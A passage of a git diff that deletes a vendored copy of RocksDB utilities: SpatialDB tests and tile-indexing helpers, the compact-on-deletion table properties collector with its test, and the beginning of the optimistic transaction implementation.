-  fs.Set("n", Variant());  // null
-  fs.Set("m", 3.25);
-
-  ASSERT_TRUE(fs.Find("w") == fs.end());
-  ASSERT_TRUE(fs.Find("x") != fs.end());
-  ASSERT_TRUE((*fs.Find("x")).second == Variant(static_cast<uint64_t>(3)));
-  ASSERT_TRUE((*fs.Find("y")).second != Variant(true));
-  std::set<std::string> keys({"a", "x", "y", "n", "m"});
-  for (const auto& x : fs) {
-    ASSERT_TRUE(keys.find(x.first) != keys.end());
-    keys.erase(x.first);
-  }
-  ASSERT_EQ(keys.size(), 0U);
-
-  std::string serialized;
-  fs.Serialize(&serialized);
-
-  FeatureSet deserialized;
-  ASSERT_TRUE(deserialized.Deserialize(serialized));
-
-  ASSERT_TRUE(deserialized.Contains("a"));
-  ASSERT_EQ(deserialized.Get("a").type(), Variant::kString);
-  ASSERT_EQ(deserialized.Get("a").get_string(), "b");
-  ASSERT_TRUE(deserialized.Contains("x"));
-  ASSERT_EQ(deserialized.Get("x").type(), Variant::kInt);
-  ASSERT_EQ(deserialized.Get("x").get_int(), static_cast<uint64_t>(3));
-  ASSERT_TRUE(deserialized.Contains("y"));
-  ASSERT_EQ(deserialized.Get("y").type(), Variant::kBool);
-  ASSERT_EQ(deserialized.Get("y").get_bool(), false);
-  ASSERT_TRUE(deserialized.Contains("n"));
-  ASSERT_EQ(deserialized.Get("n").type(), Variant::kNull);
-  ASSERT_TRUE(deserialized.Contains("m"));
-  ASSERT_EQ(deserialized.Get("m").type(), Variant::kDouble);
-  ASSERT_EQ(deserialized.Get("m").get_double(), 3.25);
-
-  // corrupted serialization
-  serialized = serialized.substr(0, serialized.size() - 4);
-  deserialized.Clear();
-  ASSERT_TRUE(!deserialized.Deserialize(serialized));
-}
-
-TEST_F(SpatialDBTest, TestNextID) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  ASSERT_OK(SpatialDB::Create(
-      SpatialDBOptions(), dbname_,
-      {SpatialIndexOptions("simple", BoundingBox<double>(0, 0, 100, 100), 2)}));
-
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(5, 5, 10, 10),
-                        "one", FeatureSet(), {"simple"}));
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(10, 10, 15, 15),
-                        "two", FeatureSet(), {"simple"}));
-  delete db_;
-  db_ = nullptr;
-
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  assert(db_ != nullptr);
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(55, 55, 65, 65),
-                        "three", FeatureSet(), {"simple"}));
-  delete db_;
-
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  AssertCursorResults(BoundingBox<double>(0, 0, 100, 100), "simple",
-                      {"one", "two", "three"});
-  delete db_;
-}
-
-TEST_F(SpatialDBTest, FeatureSetTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  ASSERT_OK(SpatialDB::Create(
-      SpatialDBOptions(), dbname_,
-      {SpatialIndexOptions("simple", BoundingBox<double>(0, 0, 100, 100), 2)}));
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-
-  FeatureSet fs;
-  fs.Set("a", std::string("b"));
-  fs.Set("c", std::string("d"));
-
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(5, 5, 10, 10),
-                        "one", fs, {"simple"}));
-
-  Cursor* c =
-      db_->Query(ReadOptions(), BoundingBox<double>(5, 5, 10, 10), "simple");
-
-  ASSERT_TRUE(c->Valid());
-  ASSERT_EQ(c->blob().compare("one"), 0);
-  FeatureSet returned = c->feature_set();
-  ASSERT_TRUE(returned.Contains("a"));
-  ASSERT_TRUE(!returned.Contains("b"));
-  ASSERT_TRUE(returned.Contains("c"));
-  ASSERT_EQ(returned.Get("a").type(), Variant::kString);
-  ASSERT_EQ(returned.Get("a").get_string(), "b");
-  ASSERT_EQ(returned.Get("c").type(), Variant::kString);
-  ASSERT_EQ(returned.Get("c").get_string(), "d");
-
-  c->Next();
-  ASSERT_TRUE(!c->Valid());
-
-  delete c;
-  delete db_;
-}
-
-TEST_F(SpatialDBTest, SimpleTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  // iter 0 -- not read only
-  // iter 1 -- read only
-  for (int iter = 0; iter < 2; ++iter) {
-    DestroyDB(dbname_, Options());
-    ASSERT_OK(SpatialDB::Create(
-        SpatialDBOptions(), dbname_,
-        {SpatialIndexOptions("index", BoundingBox<double>(0, 0, 128, 128),
-                             3)}));
-    ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-    assert(db_ != nullptr);
-
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(33, 17, 63, 79),
-                          "one", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(65, 65, 111, 111),
-                          "two", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(1, 49, 127, 63),
-                          "three", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(20, 100, 21, 101),
-                          "four", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(81, 33, 127, 63),
-                          "five", FeatureSet(), {"index"}));
-    ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(1, 65, 47, 95),
-                          "six", FeatureSet(), {"index"}));
-
-    if (iter == 1) {
-      delete db_;
-      db_ = nullptr;
-      ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_, true));
-    }
-
-    AssertCursorResults(BoundingBox<double>(33, 17, 47, 31), "index", {"one"});
-    AssertCursorResults(BoundingBox<double>(17, 33, 79, 63), "index",
-                        {"one", "three"});
-    AssertCursorResults(BoundingBox<double>(17, 81, 63, 111), "index",
-                        {"four", "six"});
-    AssertCursorResults(BoundingBox<double>(85, 86, 85, 86), "index", {"two"});
-    AssertCursorResults(BoundingBox<double>(33, 1, 127, 111), "index",
-                        {"one", "two", "three", "five", "six"});
-    // even though the bounding box doesn't intersect, we got "four" back
-    // because
-    // it's in the same tile
-    AssertCursorResults(BoundingBox<double>(18, 98, 19, 99), "index", {"four"});
-    AssertCursorResults(BoundingBox<double>(130, 130, 131, 131), "index", {});
-    AssertCursorResults(BoundingBox<double>(81, 17, 127, 31), "index", {});
-    AssertCursorResults(BoundingBox<double>(90, 50, 91, 51), "index",
-                        {"three", "five"});
-
-    delete db_;
-    db_ = nullptr;
-  }
-}
-
-namespace {
-std::string RandomStr(Random* rnd) {
-  std::string r;
-  for (int k = 0; k < 10; ++k) {
-    r.push_back(rnd->Uniform(26) + 'a');
-  }
-  return r;
-}
-
-BoundingBox<int> RandomBoundingBox(int limit, Random* rnd, int max_size) {
-  BoundingBox<int> r;
-  r.min_x = rnd->Uniform(limit - 1);
-  r.min_y = rnd->Uniform(limit - 1);
-  r.max_x = r.min_x + rnd->Uniform(std::min(limit - 1 - r.min_x, max_size)) + 1;
-  r.max_y = r.min_y + rnd->Uniform(std::min(limit - 1 - r.min_y, max_size)) + 1;
-  return r;
-}
-
-BoundingBox<double> ScaleBB(BoundingBox<int> b, double step) {
-  return BoundingBox<double>(b.min_x * step + 1, b.min_y * step + 1,
-                             (b.max_x + 1) * step - 1,
-                             (b.max_y + 1) * step - 1);
-}
-
-}  // namespace
-
-TEST_F(SpatialDBTest, RandomizedTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  Random rnd(301);
-  std::vector<std::pair<std::string, BoundingBox<int>>> elements;
-
-  BoundingBox<double> spatial_index_bounds(0, 0, (1LL << 32), (1LL << 32));
-  ASSERT_OK(SpatialDB::Create(
-      SpatialDBOptions(), dbname_,
-      {SpatialIndexOptions("index", spatial_index_bounds, 7)}));
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  double step = (1LL << 32) / (1 << 7);
-
-  for (int i = 0; i < 1000; ++i) {
-    std::string blob = RandomStr(&rnd);
-    BoundingBox<int> bbox = RandomBoundingBox(128, &rnd, 10);
-    ASSERT_OK(db_->Insert(WriteOptions(), ScaleBB(bbox, step), blob,
-                          FeatureSet(), {"index"}));
-    elements.push_back(make_pair(blob, bbox));
-  }
-
-  // parallel
-  db_->Compact(2);
-  // serial
-  db_->Compact(1);
-
-  for (int i = 0; i < 1000; ++i) {
-    BoundingBox<int> int_bbox = RandomBoundingBox(128, &rnd, 10);
-    BoundingBox<double> double_bbox = ScaleBB(int_bbox, step);
-    std::vector<std::string> blobs;
-    for (auto e : elements) {
-      if (e.second.Intersects(int_bbox)) {
-        blobs.push_back(e.first);
-      }
-    }
-    AssertCursorResults(double_bbox, "index", blobs);
-  }
-
-  delete db_;
-}
-
-}  // namespace spatial
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as SpatialDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/spatialdb/utils.h b/thirdparty/rocksdb/utilities/spatialdb/utils.h
deleted file mode 100644
index fe4b4e2..0000000
--- a/thirdparty/rocksdb/utilities/spatialdb/utils.h
+++ /dev/null
@@ -1,95 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include <algorithm>
-
-#include "rocksdb/utilities/spatial_db.h"
-
-namespace rocksdb {
-namespace spatial {
-
-// indexing idea from http://msdn.microsoft.com/en-us/library/bb259689.aspx
-inline uint64_t GetTileFromCoord(double x, double start, double end,
-                                 uint32_t tile_bits) {
-  if (x < start) {
-    return 0;
-  }
-  uint64_t tiles = 1ull << tile_bits;
-  uint64_t r = static_cast<uint64_t>(((x - start) / (end - start)) * tiles);
-  return std::min(r, tiles - 1);
-}
-
-inline uint64_t GetQuadKeyFromTile(uint64_t tile_x, uint64_t tile_y,
-                                   uint32_t tile_bits) {
-  uint64_t quad_key = 0;
-  for (uint32_t i = 0; i < tile_bits; ++i) {
-    uint64_t mask = (1ull << i);
-    quad_key |= (tile_x & mask) << i;
-    quad_key |= (tile_y & mask) << (i + 1);
-  }
-  return quad_key;
-}
-
-inline BoundingBox<uint64_t> GetTileBoundingBox(
-    const SpatialIndexOptions& spatial_index, BoundingBox<double> bbox) {
-  return BoundingBox<uint64_t>(
-      GetTileFromCoord(bbox.min_x, spatial_index.bbox.min_x,
-                       spatial_index.bbox.max_x, spatial_index.tile_bits),
-      GetTileFromCoord(bbox.min_y, spatial_index.bbox.min_y,
-                       spatial_index.bbox.max_y, spatial_index.tile_bits),
-      GetTileFromCoord(bbox.max_x, spatial_index.bbox.min_x,
-                       spatial_index.bbox.max_x, spatial_index.tile_bits),
-      GetTileFromCoord(bbox.max_y, spatial_index.bbox.min_y,
-                       spatial_index.bbox.max_y, spatial_index.tile_bits));
-}
-
-// big endian can be compared using memcpy
-inline void PutFixed64BigEndian(std::string* dst, uint64_t value) {
-  char buf[sizeof(value)];
-  buf[0] = (value >> 56) & 0xff;
-  buf[1] = (value >> 48) & 0xff;
-  buf[2] = (value >> 40) & 0xff;
-  buf[3] = (value >> 32) & 0xff;
-  buf[4] = (value >> 24) & 0xff;
-  buf[5] = (value >> 16) & 0xff;
-  buf[6] = (value >> 8) & 0xff;
-  buf[7] = value & 0xff;
-  dst->append(buf, sizeof(buf));
-}
-
-// big endian can be compared using memcpy
-inline bool GetFixed64BigEndian(const Slice& input, uint64_t* value) {
-  if (input.size() < sizeof(uint64_t)) {
-    return false;
-  }
-  auto ptr = input.data();
-  *value = (static_cast<uint64_t>(static_cast<unsigned char>(ptr[0])) << 56) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[1])) << 48) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[2])) << 40) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[3])) << 32) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[4])) << 24) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[5])) << 16) |
-           (static_cast<uint64_t>(static_cast<unsigned char>(ptr[6])) << 8) |
-           static_cast<uint64_t>(static_cast<unsigned char>(ptr[7]));
-  return true;
-}
-
-inline void PutDouble(std::string* dst, double d) {
-  dst->append(reinterpret_cast<char*>(&d), sizeof(double));
-}
-
-inline bool GetDouble(Slice* input, double* d) {
-  if (input->size() < sizeof(double)) {
-    return false;
-  }
-  memcpy(d, input->data(), sizeof(double));
-  input->remove_prefix(sizeof(double));
-  return true;
-}
-
-}  // namespace spatial
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.cc
deleted file mode 100644
index 304cdff..0000000
--- a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.cc
+++ /dev/null
@@ -1,94 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "utilities/table_properties_collectors/compact_on_deletion_collector.h"
-
-#include <memory>
-#include "rocksdb/utilities/table_properties_collectors.h"
-
-namespace rocksdb {
-
-CompactOnDeletionCollector::CompactOnDeletionCollector(
-    size_t sliding_window_size,
-    size_t deletion_trigger) {
-  deletion_trigger_ = deletion_trigger;
-
-  // First, compute the number of keys in each bucket.
-  bucket_size_ =
-      (sliding_window_size + kNumBuckets - 1) / kNumBuckets;
-  assert(bucket_size_ > 0U);
-
-  Reset();
-}
-
-void CompactOnDeletionCollector::Reset() {
-  for (int i = 0; i < kNumBuckets; ++i) {
-    num_deletions_in_buckets_[i] = 0;
-  }
-  current_bucket_ = 0;
-  num_keys_in_current_bucket_ = 0;
-  num_deletions_in_observation_window_ = 0;
-  need_compaction_ = false;
-}
-
-// AddUserKey() will be called when a new key/value pair is inserted into the
-// table.
-// @params key    the user key that is inserted into the table.
-// @params value  the value that is inserted into the table.
-// @params file_size  file size up to now
-Status CompactOnDeletionCollector::AddUserKey(
-    const Slice& key, const Slice& value,
-    EntryType type, SequenceNumber seq,
-    uint64_t file_size) {
-  if (need_compaction_) {
-    // If the output file already needs to be compacted, skip the check.
-    return Status::OK();
-  }
-
-  if (num_keys_in_current_bucket_ == bucket_size_) {
-    // When the current bucket is full, advance the cursor of the
-    // ring buffer to the next bucket.
-    current_bucket_ = (current_bucket_ + 1) % kNumBuckets;
-
-    // Update the current count of observed deletion keys by excluding
-    // the number of deletion keys in the oldest bucket in the
-    // observation window.
-    assert(num_deletions_in_observation_window_ >=
-        num_deletions_in_buckets_[current_bucket_]);
-    num_deletions_in_observation_window_ -=
-        num_deletions_in_buckets_[current_bucket_];
-    num_deletions_in_buckets_[current_bucket_] = 0;
-    num_keys_in_current_bucket_ = 0;
-  }
-
-  num_keys_in_current_bucket_++;
-  if (type == kEntryDelete) {
-    num_deletions_in_observation_window_++;
-    num_deletions_in_buckets_[current_bucket_]++;
-    if (num_deletions_in_observation_window_ >= deletion_trigger_) {
-      need_compaction_ = true;
-    }
-  }
-  return Status::OK();
-}
-
-TablePropertiesCollector*
-CompactOnDeletionCollectorFactory::CreateTablePropertiesCollector(
-    TablePropertiesCollectorFactory::Context context) {
-  return new CompactOnDeletionCollector(
-      sliding_window_size_, deletion_trigger_);
-}
-
-std::shared_ptr<TablePropertiesCollectorFactory>
-    NewCompactOnDeletionCollectorFactory(
-        size_t sliding_window_size,
-        size_t deletion_trigger) {
-  return std::shared_ptr<TablePropertiesCollectorFactory>(
-      new CompactOnDeletionCollectorFactory(
-          sliding_window_size, deletion_trigger));
-}
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.h b/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.h
deleted file mode 100644
index bd240e5..0000000
--- a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector.h
+++ /dev/null
@@ -1,103 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include "rocksdb/utilities/table_properties_collectors.h"
-namespace rocksdb {
-
-// A factory of a table property collector that marks a SST
-// file as need-compaction when it observe at least "D" deletion
-// entries in any "N" consecutive entires.
-class CompactOnDeletionCollectorFactory
-    : public TablePropertiesCollectorFactory {
- public:
-  // A factory of a table property collector that marks a SST
-  // file as need-compaction when it observe at least "D" deletion
-  // entries in any "N" consecutive entires.
-  //
-  // @param sliding_window_size "N"
-  // @param deletion_trigger "D"
-  CompactOnDeletionCollectorFactory(
-      size_t sliding_window_size,
-      size_t deletion_trigger) :
-          sliding_window_size_(sliding_window_size),
-          deletion_trigger_(deletion_trigger) {}
-
-  virtual ~CompactOnDeletionCollectorFactory() {}
-
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override;
-
-  virtual const char* Name() const override {
-    return "CompactOnDeletionCollector";
-  }
-
- private:
-  size_t sliding_window_size_;
-  size_t deletion_trigger_;
-};
-
-class CompactOnDeletionCollector : public TablePropertiesCollector {
- public:
-  CompactOnDeletionCollector(
-      size_t sliding_window_size,
-      size_t deletion_trigger);
-
-  // AddUserKey() will be called when a new key/value pair is inserted into the
-  // table.
-  // @params key    the user key that is inserted into the table.
-  // @params value  the value that is inserted into the table.
-  // @params file_size  file size up to now
-  virtual Status AddUserKey(const Slice& key, const Slice& value,
-                            EntryType type, SequenceNumber seq,
-                            uint64_t file_size) override;
-
-  // Finish() will be called when a table has already been built and is ready
-  // for writing the properties block.
-  // @params properties  User will add their collected statistics to
-  // `properties`.
-  virtual Status Finish(UserCollectedProperties* properties) override {
-    Reset();
-    return Status::OK();
-  }
-
-  // Return the human-readable properties, where the key is property name and
-  // the value is the human-readable form of value.
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties();
-  }
-
-  // The name of the properties collector can be used for debugging purpose.
-  virtual const char* Name() const override {
-    return "CompactOnDeletionCollector";
-  }
-
-  // EXPERIMENTAL Return whether the output file should be further compacted
-  virtual bool NeedCompact() const override {
-    return need_compaction_;
-  }
-
-  static const int kNumBuckets = 128;
-
- private:
-  void Reset();
-
-  // A ring buffer that used to count the number of deletion entries for every
-  // "bucket_size_" keys.
-  size_t num_deletions_in_buckets_[kNumBuckets];
-  // the number of keys in a bucket
-  size_t bucket_size_;
-
-  size_t current_bucket_;
-  size_t num_keys_in_current_bucket_;
-  size_t num_deletions_in_observation_window_;
-  size_t deletion_trigger_;
-  // true if the current SST file needs to be compacted.
-  bool need_compaction_;
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
deleted file mode 100644
index 3c946bf..0000000
--- a/thirdparty/rocksdb/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
+++ /dev/null
@@ -1,178 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <stdio.h>
-
-#ifndef ROCKSDB_LITE
-#include <algorithm>
-#include <cmath>
-#include <vector>
-
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/utilities/table_properties_collectors.h"
-#include "util/random.h"
-#include "utilities/table_properties_collectors/compact_on_deletion_collector.h"
-
-int main(int argc, char** argv) {
-  const int kWindowSizes[] =
-      {1000, 10000, 10000, 127, 128, 129, 255, 256, 257, 2, 10000};
-  const int kDeletionTriggers[] =
-      {500, 9500, 4323, 47, 61, 128, 250, 250, 250, 2, 2};
-  rocksdb::TablePropertiesCollectorFactory::Context context;
-  context.column_family_id =
-      rocksdb::TablePropertiesCollectorFactory::Context::kUnknownColumnFamily;
-
-  std::vector<int> window_sizes;
-  std::vector<int> deletion_triggers;
-  // deterministic tests
-  for (int test = 0; test < 9; ++test) {
-    window_sizes.emplace_back(kWindowSizes[test]);
-    deletion_triggers.emplace_back(kDeletionTriggers[test]);
-  }
-
-  // randomize tests
-  rocksdb::Random rnd(301);
-  const int kMaxTestSize = 100000l;
-  for (int random_test = 0; random_test < 100; random_test++) {
-    int window_size = rnd.Uniform(kMaxTestSize) + 1;
-    int deletion_trigger = rnd.Uniform(window_size);
-    window_sizes.emplace_back(window_size);
-    deletion_triggers.emplace_back(deletion_trigger);
-  }
-
-  assert(window_sizes.size() == deletion_triggers.size());
-
-  for (size_t test = 0; test < window_sizes.size(); ++test) {
-    const int kBucketSize = 128;
-    const int kWindowSize = window_sizes[test];
-    const int kPaddedWindowSize =
-        kBucketSize * ((window_sizes[test] + kBucketSize - 1) / kBucketSize);
-    const int kNumDeletionTrigger = deletion_triggers[test];
-    const int kBias = (kNumDeletionTrigger + kBucketSize - 1) / kBucketSize;
-    // Simple test
-    {
-      std::unique_ptr<rocksdb::TablePropertiesCollector> collector;
-      auto factory = rocksdb::NewCompactOnDeletionCollectorFactory(
-          kWindowSize, kNumDeletionTrigger);
-      collector.reset(factory->CreateTablePropertiesCollector(context));
-      const int kSample = 10;
-      for (int delete_rate = 0; delete_rate <= kSample; ++delete_rate) {
-        int deletions = 0;
-        for (int i = 0; i < kPaddedWindowSize; ++i) {
-          if (i % kSample < delete_rate) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryDelete, 0, 0);
-            deletions++;
-          } else {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        if (collector->NeedCompact() !=
-            (deletions >= kNumDeletionTrigger) &&
-            std::abs(deletions - kNumDeletionTrigger) > kBias) {
-          fprintf(stderr, "[Error] collector->NeedCompact() != (%d >= %d)"
-                  " with kWindowSize = %d and kNumDeletionTrigger = %d\n",
-                  deletions, kNumDeletionTrigger,
-                  kWindowSize, kNumDeletionTrigger);
-          assert(false);
-        }
-        collector->Finish(nullptr);
-      }
-    }
-
-    // Only one section of a file satisfies the compaction trigger
-    {
-      std::unique_ptr<rocksdb::TablePropertiesCollector> collector;
-      auto factory = rocksdb::NewCompactOnDeletionCollectorFactory(
-          kWindowSize, kNumDeletionTrigger);
-      collector.reset(factory->CreateTablePropertiesCollector(context));
-      const int kSample = 10;
-      for (int delete_rate = 0; delete_rate <= kSample; ++delete_rate) {
-        int deletions = 0;
-        for (int section = 0; section < 5; ++section) {
-          int initial_entries = rnd.Uniform(kWindowSize) + kWindowSize;
-          for (int i = 0; i < initial_entries; ++i) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        for (int i = 0; i < kPaddedWindowSize; ++i) {
-          if (i % kSample < delete_rate) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryDelete, 0, 0);
-            deletions++;
-          } else {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        for (int section = 0; section < 5; ++section) {
-          int ending_entries = rnd.Uniform(kWindowSize) + kWindowSize;
-          for (int i = 0; i < ending_entries; ++i) {
-            collector->AddUserKey("hello", "rocksdb",
-                                  rocksdb::kEntryPut, 0, 0);
-          }
-        }
-        if (collector->NeedCompact() != (deletions >= kNumDeletionTrigger) &&
-            std::abs(deletions - kNumDeletionTrigger) > kBias) {
-          fprintf(stderr, "[Error] collector->NeedCompact() %d != (%d >= %d)"
-                  " with kWindowSize = %d, kNumDeletionTrigger = %d\n",
-                  collector->NeedCompact(),
-                  deletions, kNumDeletionTrigger, kWindowSize,
-                  kNumDeletionTrigger);
-          assert(false);
-        }
-        collector->Finish(nullptr);
-      }
-    }
-
-    // TEST 3:  Issues a lots of deletes, but their density is not
-    // high enough to trigger compaction.
-    {
-      std::unique_ptr<rocksdb::TablePropertiesCollector> collector;
-      auto factory = rocksdb::NewCompactOnDeletionCollectorFactory(
-          kWindowSize, kNumDeletionTrigger);
-      collector.reset(factory->CreateTablePropertiesCollector(context));
-      assert(collector->NeedCompact() == false);
-      // Insert "kNumDeletionTrigger * 0.95" deletions for every
-      // "kWindowSize" and verify compaction is not needed.
-      const int kDeletionsPerSection = kNumDeletionTrigger * 95 / 100;
-      if (kDeletionsPerSection >= 0) {
-        for (int section = 0; section < 200; ++section) {
-          for (int i = 0; i < kPaddedWindowSize; ++i) {
-            if (i < kDeletionsPerSection) {
-              collector->AddUserKey("hello", "rocksdb",
-                                    rocksdb::kEntryDelete, 0, 0);
-            } else {
-              collector->AddUserKey("hello", "rocksdb",
-                                    rocksdb::kEntryPut, 0, 0);
-            }
-          }
-        }
-        if (collector->NeedCompact() &&
-            std::abs(kDeletionsPerSection - kNumDeletionTrigger) > kBias) {
-          fprintf(stderr, "[Error] collector->NeedCompact() != false"
-                  " with kWindowSize = %d and kNumDeletionTrigger = %d\n",
-                  kWindowSize, kNumDeletionTrigger);
-          assert(false);
-        }
-        collector->Finish(nullptr);
-      }
-    }
-  }
-  fprintf(stderr, "PASSED\n");
-}
-#else
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as RocksDBLite does not include utilities.\n");
-  return 0;
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.cc b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.cc
deleted file mode 100644
index 89d3226..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction.cc
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/optimistic_transaction.h"
-
-#include <string>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-struct WriteOptions;
-
-OptimisticTransaction::OptimisticTransaction(
-    OptimisticTransactionDB* txn_db, const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options)
-    : TransactionBaseImpl(txn_db->GetBaseDB(), write_options), txn_db_(txn_db) {
-  Initialize(txn_options);
-}
-
-void OptimisticTransaction::Initialize(
-    const OptimisticTransactionOptions& txn_options) {
-  if (txn_options.set_snapshot) {
-    SetSnapshot();
-  }
-}
-
-void OptimisticTransaction::Reinitialize(
-    OptimisticTransactionDB* txn_db, const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options) {
-  TransactionBaseImpl::Reinitialize(txn_db->GetBaseDB(), write_options);
-  Initialize(txn_options);
-}
-
-OptimisticTransaction::~OptimisticTransaction() {}
-
-void OptimisticTransaction::Clear() { TransactionBaseImpl::Clear(); }
-
-Status OptimisticTransaction::Prepare() {
-  return Status::InvalidArgument(
-      "Two phase commit not supported for optimistic transactions.");
-}
-
-Status OptimisticTransaction::Commit() {
-  // Set up callback which will call CheckTransactionForConflicts() to
-  // check whether this transaction is safe to be committed.
-  OptimisticTransactionCallback callback(this);
-
-  DBImpl* db_impl = static_cast_with_check<DBImpl, DB>(db_->GetRootDB());
-
-  Status s = db_impl->WriteWithCallback(
-      write_options_, GetWriteBatch()->GetWriteBatch(), &callback);
-
-  if (s.ok()) {
-    Clear();
-  }
-
-  return s;
-}
-
-Status OptimisticTransaction::Rollback() {
-  Clear();
-  return Status::OK();
-}
-
-// Record this key so that we can check it for conflicts at commit time.
-//
-// 'exclusive' is unused for OptimisticTransaction.
-Status OptimisticTransaction::TryLock(ColumnFamilyHandle* column_family,
-                                      const Slice& key, bool read_only,
-                                      bool exclusive, bool untracked) {
-  if (untracked) {
-    return Status::OK();
-  }
-  uint32_t cfh_id = GetColumnFamilyID(column_family);
-
-  SetSnapshotIfNeeded();
-
-  SequenceNumber seq;
-  if (snapshot_) {
-    seq = snapshot_->GetSequenceNumber();
-  } else {
-    seq = db_->GetLatestSequenceNumber();
-  }
-
-  std::string key_str = key.ToString();
-
-  TrackKey(cfh_id, key_str, seq, read_only, exclusive);
-
-  // Always return OK. Confilct checking will happen at commit time.
-  return Status::OK();
-}
-
-// Returns OK if it is safe to commit this transaction.  Returns Status::Busy
-// if there are read or write conflicts that would prevent us from committing OR
-// if we can not determine whether there would be any such conflicts.
-//
